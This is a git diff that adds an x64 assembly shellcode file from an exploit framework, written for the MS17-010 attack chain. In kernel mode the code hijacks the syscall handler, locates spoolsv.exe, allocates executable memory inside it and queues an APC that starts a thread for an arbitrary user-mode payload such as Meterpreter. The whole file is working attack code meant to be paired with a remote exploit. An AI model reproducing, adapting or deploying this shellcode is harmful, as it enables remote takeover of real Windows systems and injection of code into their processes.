diff --git a/external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm b/external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm new file mode 100644 index 0000000000..cb27899512 --- /dev/null +++ b/external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm @@ -0,0 +1,606 @@ +; +; Windows x86/x64 Multi-Arch Kernel Ring 0 to Ring 3 via Queued APC Shellcode +; +; Author: Sean Dillon (@zerosum0x0) +; Copyright: (c) 2017 RiskSense, Inc. +; Release: 04 May 2017 +; License: MSF License +; Build: nasm ./kernel.asm +; Acknowledgements: Stephen Fewer, skape, Equation Group, Shadow Brokers +; +; Description: +; Injects an APC into a specified process. Once in userland, a new thread is +; created to host the main payload. Add whatever userland payload you want to +; the end, prepended with two bytes that equal the little endian size of your +; payload. The userland payload should detect arch if multi-arch is enabled. +; This payload is convenient, smaller or null-free payloads can be crafted +; using this as a base template. +; +; References: +; https://github.com/Risksense-Ops/MS17-010 +; https://msdn.microsoft.com/en-us/library/9z1stfyw.aspx +; https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html +; https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/ +; http://apexesnsyscalls.blogspot.com/2011/09/using-apcs-to-inject-your-dll.html +; + +BITS 64 +ORG 0 +default rel + +section .text +global payload_start + +; options which have set values +%define PROCESS_HASH SPOOLSV_EXE_HASH ; the process to queue APC into +%define MAX_PID 0x10000 +%define WINDOWS_BUILD 7601 ; offsets appear relatively stable + +; options which can be enabled +%define USE_X86 ; x86 payload +%define USE_X64 ; x64 payload +%define STATIC_ETHREAD_DELTA ; use a pre-calculated ThreadListEntry +%define ERROR_CHECKS ; lessen chance of BSOD, but bigger size +%define SYSCALL_OVERWRITE ; to run at process IRQL in syscall +; %define CLEAR_DIRECTION_FLAG ; if cld should be run + +; hashes for export directory lookups +LSASS_EXE_HASH equ 0x60795e4a ; hash("lsass.exe") +SPOOLSV_EXE_HASH equ 0xdd1f77bf ; hash("spoolsv.exe") +CREATETHREAD_HASH equ 0x221b4546 ; hash("CreateThread") +PSGETCURRENTPROCESS_HASH equ 0x6211725c ; hash("PsGetCurrentProcess") +PSLOOKUPPROCESSBYPROCESSID_HASH equ 0x4ba25566 ; hash("PsLookupProcessByProcessId") +PSGETPROCESSIMAGEFILENAME_HASH equ 0x2d726fa3 ; hash("PsGetProcessImageFileName") +PSGETTHREADTEB_HASH equ 0x9d364026 ; hash("PsGetThreadTeb") +KEGETCURRENTPROCESS_HASH equ 0x5e91685c ; hash("KeGetCurrentProcess") +KEGETCURRENTTHREAD_HASH equ 0x30a3ba7a ; hash("KeGetCurrentThread") +KEINITIALIZEAPC_HASH equ 0x4b55ceac ; hash("KeInitializeApc") +KEINSERTQUEUEAPC_HASH equ 0x9e093818 ; hash("KeInsertQueueApc") +KESTACKATTACHPROCESS_HASH equ 0xdc1124e5 ; hash("KeStackAttachProcess") +KEUNSTACKDETACHPROCESS_HASH equ 0x7db3b722 ; hash("KeUnstackDetachProcess") +ZWALLOCATEVIRTUALMEMORY_HASH equ 0xee0aca4b ; hash("ZwAllocateVirtualMemory") +EXALLOCATEPOOL_HASH equ 0x9150ac26 ; hash("ExAllocatePool") +OBDEREFERENCEOBJECT_HASH equ 0x854de20d ; hash("ObDereferenceObject") +KERNEL32_DLL_HASH equ 0x92af16da ; hash_U(L"kernel32.dll", len) + +; offsets for opaque structures +%if WINDOWS_BUILD == 7601 +EPROCESS_THREADLISTHEAD_BLINK_OFFSET equ 0x308 +ETHREAD_ALERTABLE_OFFSET equ 0x4c +TEB_ACTIVATIONCONTEXTSTACKPOINTER_OFFSET equ 0x2c8 ; ActivationContextStackPointer : Ptr64 _ACTIVATION_CONTEXT_STACK +ETHREAD_THREADLISTENTRY_OFFSET equ 0x420 ; only used if STATIC_ETHREAD_DELTA defined +%endif + +; now the shellcode begins +payload_start: + +%ifdef SYSCALL_OVERWRITE +syscall_overwrite: + +x64_syscall_overwrite: + mov ecx, 0xc0000082 ; IA32_LSTAR syscall MSR + rdmsr + ;movabs rbx, 0xffffffffffd00ff8 + db 0x48, 0xbb, 0xf8, 0x0f, 0xd0, 0xff, 0xff, 0xff, 0xff, 0xff + mov dword [rbx+0x4], edx ; save old syscall handler + mov dword [rbx], eax + lea rax, [rel x64_syscall_handler] ; load new syscall handler + mov rdx, rax + shr rdx, 0x20 + + wrmsr + ret + +x64_syscall_handler: + swapgs + mov qword [gs:0x10], rsp + mov rsp, qword [gs:0x1a8] + + push rax + push rbx + push rcx + push rdx + push rsi + push rdi + push rbp + push r8 + push r9 + push r10 + push r11 + push r12 + push r13 + push r14 + push r15 + + push 0x2b + push qword [gs:0x10] + push r11 + push 0x33 + push rcx + mov rcx, r10 + sub rsp, 0x8 + push rbp + sub rsp, 0x158 + lea rbp, [rsp + 0x80] + + mov qword [rbp+0xc0],rbx + mov qword [rbp+0xc8],rdi + mov qword [rbp+0xd0],rsi + + ;movabs rax, 0xffffffffffd00ff8 + db 0x48, 0xa1, 0xf8, 0x0f, 0xd0, 0xff, 0xff, 0xff, 0xff, 0xff + + mov rdx, rax + shr rdx, 0x20 + xor rbx, rbx + dec ebx + and rax, rbx + mov ecx, 0xc0000082 + wrmsr + sti + + call x64_kernel_start + + cli + mov rsp, qword [abs gs:0x1a8] + sub rsp, 0x78 + pop r15 + pop r14 + pop r13 + pop r12 + pop r11 + pop r10 + pop r9 + pop r8 + pop rbp + pop rdi + pop rsi + pop rdx + pop rcx + pop rbx + pop rax + mov rsp, qword [abs gs:0x10] + swapgs + jmp [0xffffffffffd00ff8] + +; SYSCALL_OVERWRITE +%endif + +x64_kernel_start: +; Some "globals", which should not be clobbered, these are also ABI non-volatile +; ---------------------------------------------- +; r15 = ntoskrnl.exe base address (DOS MZ header) +; r14 = &x64_kernel_start +; r13 = PKAPC_STATE +; rbx = PID/PEPROCESS +; r12 = ThreadListEntry offset, later ETHREAD that is alertable +; rbp = current rsp + +%ifdef CLEAR_DIRECTION_FLAG + cld +%endif + + ; we will restore non-volatile registers + push rsi ; save clobbered registers + push r15 ; r15 = ntoskernl.exe + push r14 ; r14 = &x64_kernel_start + push r13 ; r13 = PKAPC_STATE + push r12 ; r12 = ETHREAD/offsets + push rbx ; rbx = PID/EPROCESS + + push rbp + + mov rbp, rsp ; we'll use the base pointer + and sp, 0xFFF0 ; align stack to ABI boundary + sub rsp, 0x20 ; reserve shadow stack + + lea r14, [rel x64_kernel_start] ; for use in pointers + +; this stub loads ntoskrnl.exe into r15 +x64_find_nt_idt: + mov r15, qword [gs:0x38] ; get IdtBase of KPCR + mov r15, qword [r15 + 0x4] ; get ISR address + shr r15, 0xc ; strip to page size + shl r15, 0xc + +_x64_find_nt_idt_walk_page: + sub r15, 0x1000 ; walk along page size + mov rsi, qword [r15] + cmp si, 0x5a4d ; 'MZ' header + jne _x64_find_nt_idt_walk_page + +; dynamically finds the offset to ETHREAD.ThreadListEntry +find_threadlistentry_offset: + +%ifdef STATIC_ETHREAD_DELTA + mov r12, ETHREAD_THREADLISTENTRY_OFFSET +%else + mov r11d, PSGETCURRENTPROCESS_HASH + call x64_block_api_direct + + mov rsi, rax + add rsi, EPROCESS_THREADLISTHEAD_BLINK_OFFSET ; PEPROCESS->ThreadListHead + + mov r11d, KEGETCURRENTTHREAD_HASH + call x64_block_api_direct + + mov rcx, rsi ; save ThreadListHead + +_find_threadlistentry_offset_compare_threads: + cmp rax, rsi + ja _find_threadlistentry_offset_walk_threads + lea rdx, [rax + 0x500] + cmp rdx, rsi + jb _find_threadlistentry_offset_walk_threads + sub rsi, rax + jmp _find_threadlistentry_offset_calc_thread_exit + +_find_threadlistentry_offset_walk_threads: + mov rsi, qword [rsi] ; move up the list entries + cmp rsi, rcx ; make sure we exit this loop at some point + jne _find_threadlistentry_offset_compare_threads + +_find_threadlistentry_offset_calc_thread_exit: + mov r12, rsi +%endif + +; now we need to find the EPROCESS to inject into +x64_find_process_name: + xor ebx, ebx + +_x64_find_process_name_loop_pid: + mov ecx, ebx + add ecx, 0x4 +%ifdef MAX_PID + cmp ecx, MAX_PID + jge x64_kernel_exit +%endif + + mov rdx, r14 ; PEPROCESS* + mov ebx, ecx ; save current PID + + ; PsLookupProcessById(dwPID, &x64_kernel_start); + mov r11d, PSLOOKUPPROCESSBYPROCESSID_HASH + call x64_block_api_direct + + test eax, eax ; see if STATUS_SUCCESS + jnz _x64_find_process_name_loop_pid + + mov rcx, [r14] ; rcx = *PEPROCESS + + ; PsGetProcessImageFileName(*(&x64_kernel_start)); + mov r11d, PSGETPROCESSIMAGEFILENAME_HASH + call x64_block_api_direct + + mov rsi, rax + call x64_calc_hash + + cmp r9d, PROCESS_HASH + + jne _x64_find_process_name_loop_pid + +x64_attach_process: + mov rbx, [r14] ; r14 = EPROCESS + + lea r13, [r14 + 16] + mov rdx, r13 ; rdx = (PRKAPC_STATE)&x64_kernel_start + 16 + mov rcx, rbx ; rcx = PEPROCESS + + ; KeStackAttachProcess(PEPROCESS, &x64_kernel_start + 16); + mov r11d, KESTACKATTACHPROCESS_HASH + call x64_block_api_direct + + ; ZwAllocateVirtualMemory + push 0x40 ; PAGE_EXECUTE_READWRITE + push 0x1000 ; AllocationType + + lea r9, [r14 + 8] ; r9 = pRegionSize + mov qword [r9], 0x1000 ; *pRegionSize = 0x1000 + + xor r8, r8 ; ZeroBits = 0 + mov rdx, r14 ; rdx = BaseAddress + xor ecx, ecx + mov qword [rdx], rcx ; set *BaseAddress = NULL + not rcx ; rcx = 0xffffffffffffffff + + ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, 0x1000, 0x1000, 0x40); + mov r11d, ZWALLOCATEVIRTUALMEMORY_HASH + sub rsp, 0x20 ; we have to reserve new shadow stack + call x64_block_api_direct + +%ifdef ERROR_CHECKS + test eax, eax + jnz x64_kernel_exit_cleanup +%endif + +; rep movs kernel -> userland +x64_memcpy_userland_payload: + mov rdi, [r14] + lea rsi, [rel userland_start] + xor ecx, ecx + add cx, word [rel userland_payload_size] ; size of payload userland + add cx, userland_payload - userland_start ; size of our userland + rep movsb + +; Teb loop to find an alertable thread +x64_find_alertable_thread: + mov rsi, rbx ; rsi = EPROCESS + add rsi, EPROCESS_THREADLISTHEAD_BLINK_OFFSET ; rsi = EPROCESS.ThreadListHead.Blink + + mov rcx, rsi ; save the head pointer + +_x64_find_alertable_thread_loop: + mov rdx, [rcx] + +%ifdef ERROR_CHECKS +; todo: don't cmp on first element +; cmp rsi, rcx +; je x64_kernel_exit_cleanup +%endif + + sub rdx, r12 ; sub offset + push rcx + push rdx + mov rcx, rdx + + sub rsp, 0x20 + mov r11d, PSGETTHREADTEB_HASH + call x64_block_api_direct + add rsp, 0x20 + + pop rdx + pop rcx + + test rax, rax ; check if TEB is NULL + je _x64_find_alertable_thread_skip_next + + mov rax, qword [rax + TEB_ACTIVATIONCONTEXTSTACKPOINTER_OFFSET] + test rax, rax + je _x64_find_alertable_thread_skip_next + + add rdx, ETHREAD_ALERTABLE_OFFSET + mov eax, dword [rdx] + bt eax, 0x5 + jb _x64_find_alertable_thread_found + +_x64_find_alertable_thread_skip_next: + mov rcx, [rcx] + jmp _x64_find_alertable_thread_loop + +_x64_find_alertable_thread_found: + sub rdx, ETHREAD_ALERTABLE_OFFSET + mov r12, rdx + +x64_create_apc: + ; ExAllocatePool(POOL_TYPE.NonPagedPool, 0x90); + xor edx, edx + add dl, 0x90 + xor ecx, ecx + mov r11d, EXALLOCATEPOOL_HASH + call x64_block_api_direct + + ;mov r12, rax + ;mov r11d, KEGETCURRENTTHREAD_HASH + ;call x64_block_api_direct + +; KeInitializeApc(rcx = apc, +; rdx = pThread, +; r8 = NULL = OriginalApcEnvironment, +; r9 = KernelApcRoutine, +; NULL, +; InjectionShellCode, +; 1 /* UserMode */, +; NULL /* Context */); + mov rcx, rax ; pool APC + lea r9, [rcx + 0x80] ; dummy kernel APC function + mov byte [r9], 0xc3 ; ret + + mov rdx, r12 ; pThread; + mov r12, rax ; save APC + xor r8, r8 ; OriginalApcEnvironment = NULL + + push r8 ; Context = NULL + push 0x1 ; UserMode + mov rax, [r14] + push rax ; userland shellcode + push r8 ; NULL + + sub rsp, 0x20 + mov r11d, KEINITIALIZEAPC_HASH + call x64_block_api_direct + + ; KeInsertQueueApc(pAPC, NULL, NULL, NULL); + xor edx, edx + push rdx + push rdx + pop r8 + pop r9 + mov rcx, r12 + + mov r11d, KEINSERTQUEUEAPC_HASH + call x64_block_api_direct + +x64_kernel_exit_cleanup: + ; KeUnstackDetachProcess(pApcState) + mov rcx, r13 + mov r11d, KEUNSTACKDETACHPROCESS_HASH + call x64_block_api_direct + + ; ObDereferenceObject(PEPROCESS) + mov rcx, rbx + mov r11d, OBDEREFERENCEOBJECT_HASH + call x64_block_api_direct + +x64_kernel_exit: + + mov rsp, rbp ; fix stack + + pop rbp + + pop rbx + pop r12 + pop r13 + pop r14 + pop r15 + pop rsi ; restore clobbered registers and return + + ret + +userland_start: + +x64_userland_start: + + jmp x64_userland_start_thread + +; user and kernel mode re-use this code +x64_calc_hash: + xor r9, r9 + +_x64_calc_hash_loop: + xor eax, eax + lodsb ; Read in the next byte of the ASCII function name + ror r9d, 13 ; Rotate right our hash value + cmp al, 'a' + jl _x64_calc_hash_not_lowercase + sub al, 0x20 ; If so normalise to uppercase +_x64_calc_hash_not_lowercase: + add r9d, eax ; Add the next byte of the name + cmp al, ah ; Compare AL to AH (\0) + jne _x64_calc_hash_loop + + ret + +x64_block_find_dll: + xor edx, edx + mov rdx, [gs:rdx + 96] + mov rdx, [rdx + 24] ; PEB->Ldr + mov rdx, [rdx + 32] ; InMemoryOrder list + +_x64_block_find_dll_next_mod: + mov rdx, [rdx] + mov rsi, [rdx + 80] ; unicode string + movzx rcx, word [rdx + 74] ; rcx = len + + xor r9d, r9d + +_x64_block_find_dll_loop_mod_name: + xor eax, eax + lodsb + cmp al, 'a' + jl _x64_block_find_dll_not_lowercase + sub al, 0x20 + +_x64_block_find_dll_not_lowercase: + ror r9d, 13 + add r9d, eax + loop _x64_block_find_dll_loop_mod_name + + cmp r9d, r11d + jnz _x64_block_find_dll_next_mod + + mov r15, [rdx + 32] + ret + +x64_block_api_direct: + mov rax, r15 ; make copy of module + + push r9 ; Save parameters + push r8 + push rdx + push rcx + push rsi + + mov rdx, rax + mov eax, dword [rdx+60] ; Get PE header e_lfanew + add rax, rdx + mov eax, dword [rax+136] ; Get export tables RVA + +%ifdef ERROR_CHECKS + ; test rax, rax ; EAT not found + ; jz _block_api_not_found +%endif + + add rax, rdx + push rax ; save EAT + + mov ecx, dword [rax+24] ; NumberOfFunctions + mov r8d, dword [rax+32] ; FunctionNames + add r8, rdx + +_x64_block_api_direct_get_next_func: + ; When we reach the start of the EAT (we search backwards), we hang or crash + dec rcx ; decrement NumberOfFunctions + mov esi, dword [r8+rcx*4] ; Get rva of next module name + add rsi, rdx ; Add the modules base address + + call x64_calc_hash + + cmp r9d, r11d ; Compare the hashes + jnz _x64_block_api_direct_get_next_func ; try the next function + + +_x64_block_api_direct_finish: + + pop rax ; restore EAT + mov r8d, dword [rax+36] + add r8, rdx ; ordinate table virtual address + mov cx, [r8+2*rcx] ; desired functions ordinal + mov r8d, dword [rax+28] ; Get the function addresses table rva + add r8, rdx ; Add the modules base address + mov eax, dword [r8+4*rcx] ; Get the desired functions RVA + add rax, rdx ; Add the modules base address to get the functions actual VA + + pop rsi + pop rcx + pop rdx + pop r8 + pop r9 + pop r11 ; pop ret addr + + ; sub rsp, 0x20 ; shadow space + push r11 ; push ret addr + + jmp rax + + +x64_userland_start_thread: + push rsi + push r15 + push rbp + + mov rbp, rsp + sub rsp, 0x20 + + mov r11d, KERNEL32_DLL_HASH + call x64_block_find_dll + + xor ecx, ecx + + push rcx + push rcx + + push rcx ; lpThreadId = NULL + push rcx ; dwCreationFlags = 0 + pop r9 ; lpParameter = NULL + lea r8, [rel userland_payload] ; lpStartAddr = &threadstart + pop rdx ; lpThreadAttributes = NULL + + sub rsp, 0x20 + mov r11d, CREATETHREAD_HASH ; hash("CreateThread") + call x64_block_api_direct ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL); + + mov rsp, rbp + pop rbp + pop r15 + pop rsi + ret + +userland_payload_size: + db 0x01 + db 0x00 + +userland_payload: + ; insert userland payload here + ; such as meterpreter + ; or reflective dll with the metasploit MZ pre-stub + ret